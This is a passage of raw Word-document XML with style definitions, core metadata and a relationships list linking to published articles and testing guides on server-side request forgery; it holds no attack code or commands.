    <w:rsid w:val="001D4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2CB"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003C3077"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003C3077"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="003C30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30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0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3077"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00F357C4"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F357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7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drobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vickieli.medium.com/bypassing-ssrf-protection-e111ae70727b"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ravinponnusamy.medium.com/ssrf-payloads-f09b2a86a8b4" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vickieli.medium.com/exploiting-ssrfs-b3a29dd7437" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978"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zone.com/articles/the-server-side-request-forgery-vulnerability-and"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portswigger-labs.net/hackabilit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wasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forger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2137</TotalTime>
  <Pages>5</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9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-03T03:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-06T17:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>